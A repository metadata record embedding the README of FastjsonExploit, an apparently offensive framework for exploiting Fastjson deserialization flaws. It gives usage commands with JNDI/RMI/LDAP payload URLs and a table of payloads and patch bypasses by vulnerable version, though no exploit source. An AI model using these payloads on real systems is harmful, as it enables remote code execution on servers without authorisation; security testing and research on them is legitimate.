{"id":13539188,"url":"https://github.com/c0ny1/fastjsonexploit","last_synced_at":"2025-05-16T10:07:43.199Z","repository":{"id":37745782,"uuid":"197881741","full_name":"c0ny1/FastjsonExploit","owner":"c0ny1","description":"Fastjson vulnerability quickly exploits the framework（fastjson漏洞快速利用框架）","archived":false,"fork":false,"pushed_at":"2022-12-16T03:56:54.000Z","size":16216,"stargazers_count":1315,"open_issues_count":8,"forks_count":175,"subscribers_count":14,"default_branch":"master","last_synced_at":"2025-04-09T04:07:51.067Z","etag":null,"topics":["exp","exploiting-vulnerabilities","fastjson","poc"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/c0ny1.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-07-20T04:55:57.000Z","updated_at":"2025-04-06T16:33:15.000Z","dependencies_parsed_at":"2023-01-29T08:10:11.321Z","dependency_job_id":null,"html_url":"https://github.com/c0ny1/FastjsonExploit","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/c0ny1%2FFastjsonExploit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/c0ny1%2FFastjsonExploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/c0ny1%2FFastjsonExploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/c0ny1%2FFastjsonExploit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/c0ny1","download_url":"https://codeload.github.com/c0ny1/FastjsonExploit/tar.gz/refs/heads/master","host
":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254509476,"owners_count":22082891,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exp","exploiting-vulnerabilities","fastjson","poc"],"created_at":"2024-08-01T09:01:21.446Z","updated_at":"2025-05-16T10:07:38.190Z","avatar_url":"https://github.com/c0ny1.png","language":"Java","funding_links":[],"categories":["\u003ca id=\"683b645c2162a1fce5f24ac2abfa1973\"\u003e\u003c/a\u003e漏洞\u0026\u0026漏洞管理\u0026\u0026漏洞发现/挖掘\u0026\u0026漏洞开发\u0026\u0026漏洞利用\u0026\u0026Fuzzing"],"sub_categories":["\u003ca id=\"41ae40ed61ab2b61f2971fea3ec26e7c\"\u003e\u003c/a\u003e漏洞利用"],"readme":"# FastjonExploit | Fastjson漏洞快速利用框架\n\n## 0x01 Introduce\n\nFastjsonExploit是一个Fastjson漏洞快速漏洞利用框架，主要功能如下：\n\n1. 一键生成利用payload，并启动所有利用环境。\n2. 管理Fastjson各种payload（当然是立志整理所有啦，目前6个类，共11种利用及绕过）\n\n## 0x02 Buiding\n\nRequires Java 1.7+ and Maven 3.x+\n\n```mvn clean package -DskipTests```\n\n## 0x03 Usage\n\n```\n\n\n.---- -. -. .  .   .\n   ( .',----- - - ' '\n    \\_/      ;--:-\\         __--------------------__\n   __U__n_^_''__[. 
|ooo___  | |_!_||_!_||_!_||_!_| |\n c(_ ..(_ ..(_ ..( /,,,,,,] | |___||___||___||___| |\n ,_\\___________'_|,L______],|______________________|\n/;_(@)(@)==(@)(@)   (o)(o)      (o)^(o)--(o)^(o)\n\nFastjsonExploit is a Fastjson library vulnerability exploit framework\n                Author:c0ny1\u003croot@gv7.me\u003e\n\n\nUsage: java -jar Fastjson-[version]-all.jar [payload] [option] [command]\nExp01: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 rmi://127.0.0.1:1099/Exploit \"cmd:calc\"\nExp02: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 ldap://127.0.0.1:1232/Exploit \"code:custom_code.java\"\nExp03: java -jar FastjsonExploit-[version].jar TemplatesImpl1 \"cmd:calc\"\nExp04: java -jar FastjsonExploit-[version].jar TemplatesImpl1 \"code:custom_code.java\"\n\nAvailable payload types:\n    Payload                PayloadType VulVersion      Dependencies                                      \n    -------                ----------- ----------      ------------                                      \n    BasicDataSource1       local       1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4\n    BasicDataSource2       local       1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4\n    JdbcRowSetImpl1        jndi        1.2.2.1-1.2.2.4                                                   \n    JdbcRowSetImpl2        jndi        1.2.2.1-1.2.4.1 Fastjson 1.2.41 bypass                            \n    JdbcRowSetImpl3        jndi        1.2.2.1-1.2.4.3 Fastjson 1.2.43 bypass                            \n    JdbcRowSetImpl4        jndi        1.2.2.1-1.2.4.2 Fastjson 1.2.42 bypass                            \n    JdbcRowSetImpl5        jndi        1.2.2.1-1.2.4.7 Fastjson 1.2.47 bypass                            \n    JndiDataSourceFactory1 jndi        1.2.2.1-1.2.2.4 ibatis-core:3.0                                   \n    SimpleJndiBeanFactory1 jndi        1.2.2.2-1.2.2.4 spring-context:4.3.7.RELEASE                      \n    
TemplatesImpl1         local       1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)   \n    TemplatesImpl2         local       1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)  \n```\n\n## 0x04 Notice\n* The Fastjson versions that the help text lists as exploitable for each payload are not necessarily correct. They will be corrected after further testing!\n\n## 0x05 Reference\n* https://github.com/frohoff/ysoserial\n* https://github.com/mbechler/marshalsec\n* https://github.com/kxcode/JNDI-Exploit-Bypass-Demo","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fc0ny1%2Ffastjsonexploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fc0ny1%2Ffastjsonexploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fc0ny1%2Ffastjsonexploit/lists"}